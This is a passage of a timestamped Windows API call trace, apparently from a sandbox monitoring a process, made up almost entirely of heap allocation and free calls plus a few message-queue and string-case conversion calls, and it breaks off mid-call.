[0178.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0178.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0178.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0178.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0178.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0178.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0178.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0178.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0178.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c08) returned 0xe5d020 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0178.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0178.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0178.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0178.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0178.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0178.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0178.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0178.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0178.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0178.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0178.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0178.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0178.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0178.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0178.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0178.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0178.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0178.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0178.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0xf58020 [0178.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0178.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0178.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x1057020 [0179.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0179.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0179.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0179.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0179.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0179.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf58020 | out: hHeap=0x970000) returned 1 [0179.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0179.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0179.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0179.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1057020 | out: hHeap=0x970000) returned 1 [0179.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0179.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0179.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0179.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0179.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0179.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0179.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0179.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0179.085] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0179.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0179.086] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0179.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0179.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0179.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0179.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0179.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0179.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0179.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0179.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0179.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0179.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0179.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0179.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0179.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0179.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0179.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0179.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0179.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0179.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0179.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0179.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0179.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0179.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0xf5b020 [0179.150] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0179.150] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf5b020 | out: hHeap=0x970000) returned 1 [0179.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0179.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0179.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0179.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0179.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0179.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0179.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0179.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0179.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0179.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0179.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0179.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0179.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0179.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0179.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0179.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0179.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0179.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0179.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0179.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0179.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0179.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0179.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0179.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0179.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0179.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0179.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0179.161] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0179.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0179.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0179.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0179.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0179.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0179.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0179.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0179.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0179.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0179.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0179.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0179.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0179.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0179.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0179.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0179.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0179.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0179.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0179.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0179.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0179.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0179.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0179.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0179.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0179.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0179.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0179.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0179.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0179.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0179.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0179.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0179.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0179.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0179.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0179.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0179.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0179.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0179.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0179.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0179.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0179.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0179.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 